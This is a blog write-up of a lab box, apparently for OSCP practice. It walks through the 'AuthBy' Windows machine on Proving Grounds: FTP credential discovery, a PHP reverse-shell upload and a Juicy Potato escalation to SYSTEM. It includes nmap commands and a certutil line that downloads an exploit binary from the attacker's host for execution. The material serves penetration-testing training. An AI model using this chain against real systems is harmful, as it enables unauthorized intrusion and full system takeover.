Skip to content
Menu
Mr.KaaLi's JARV!$
  • WhoAmI
Mr.KaaLi's JARV!$

OSCP Prep Box 70 – AuthBy

Posted on July 1, 2026July 1, 2026

Difficulty – Intermediate

Platform – Proving Grounds Practice

Operating System – Windows

Focus Areas

  • FTP Enumeration
  • Credential Discovery
  • Web Shell Upload
  • Windows Enumeration
  • Juicy Potato Exploitation
  • Privilege Escalation

In this writeup, I leverage anonymous FTP access to uncover sensitive information and valid credentials that lead to a protected web application. By uploading a PHP reverse shell, I gain remote code execution and establish an initial foothold on the target. After performing local enumeration, I exploit Juicy Potato to abuse token impersonation privileges and escalate to NT AUTHORITYSYSTEM.

Table of Contents
  • Recon & Enumeration
  • Exploitation
  • Privilege Escalation
  • Key Takeaways

Recon & Enumeration

Enumeration plays a very significant role in pen testing. The more properly you enumerate the more it will be easy to get a foothold on the target.

First, we will check whether target is reachable or not with ping command:

ping Target_IP

With ping command output we found that the target is reachable.

Now let’s move ahead and run the port scan for which we will be using Nmap a popular tool for port scanning and it will provide details of the various ports which are in Open state. The command for that will be:

nmap -sC -sV -O -oA nmap/initial 192.168.190.46

nmap -sC -sV -O -p- -oA nmap/full -T4 192.168.190.46

I discovered these ports are open:

  • 21/tcp FTP service running zFTPServer 6.0 with anonymous access enabled
  • 242/tcp HTTP service running Apache httpd 2.2.21 (Win32) and PHP 5.3.8 (Basic Authentication enforced)
  • 3145/tcp zFTPServer administration service exposed
  • 3389/tcp Microsoft Remote Desktop Services (RDP)
  • OS: Microsoft Windows Server 2008 R2 Enterprise

Then I went ahead and checked the anonymous ftp and I found accounts directory and inside the accounts directory I found admin account details:

Then we have downloaded all the files using mget * :

Upon inspecting the files we discovered credentials which must be for the port 242 running http service:

The credentials worked:

Exploitation

Then moving ahead using revshell a reverse shell is generated:

Using ftp the shell was uploaded to the target:

Then a netcat listener was started and we have obtained the foothold:

local.txt flag was discovered.

Privilege Escalation

Now it was a time for escalating the privileges.

Using whoami /priv it was discovered that SeImpersonatePrivilege was enabled. Also the system info revealed that the target is running with Windows Server 2008 Standard, so I used the Juicy Potato for priv esc:

https://github.com/ivanitlearning/Juicy-Potato-x86/releases

I hosted it using python server:

I used the Windows CertUtil utility to download the file Juicy Potato from a my web server using the following command and then executed the Juicy Potato exploit:

certutil -urlcache -split -f http://192.168.45.156/Juicy.Potato.x86.exe

I added the arguments without -c CLSID parameter so the Juicy Potato will use its default CLSID.

CLSID (Class Identifier) is a unique 128-bit GUID used by Microsoft’s COM (Component Object Model) architecture to identify a specific COM object or service. Also I selected a port 1250 and there is no specific reason for that and used -p to execute the program with elevated privileges:

The defaukt CLSID didn’t worked:

I used the following link to look for CLSIDs:

https://github.com/ohpe/juicy-potato/tree/master/CLSID/?source=post_page—–96e74b36375a—————————————

The target appears to be running Windows Server 2008 R2 Enterprise so used CLSID related to that one and it worked.

So I used it as a reverse shell using nc binary:

The above image shows the proof.txt file.

Key Takeaways

  • Anonymous services often expose more information than intended and can become a valuable starting point for an attack chain.
  • Credentials may be scattered across configuration files, backups, and authentication-related artifacts, making comprehensive enumeration critical.
  • Weak or reused passwords can quickly transform information disclosure into full application compromise.
  • File upload functionality should be strictly controlled and validated to prevent arbitrary code execution.
  • Accurate operating system identification helps narrow down viable privilege escalation techniques.
  • The presence of SeImpersonatePrivilege can significantly increase the impact of a compromised service account.
  • Modern attacks frequently rely on chaining multiple low-to-medium severity issues rather than a single critical vulnerability.
  • Methodical enumeration at every stage often reveals the path to compromise more effectively than aggressive exploitation attempts.

If you enjoyed this post, share it with your friends and colleagues!

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Search

©2026 Mr.KaaLi's JARV!$ | Powered by SuperbThemes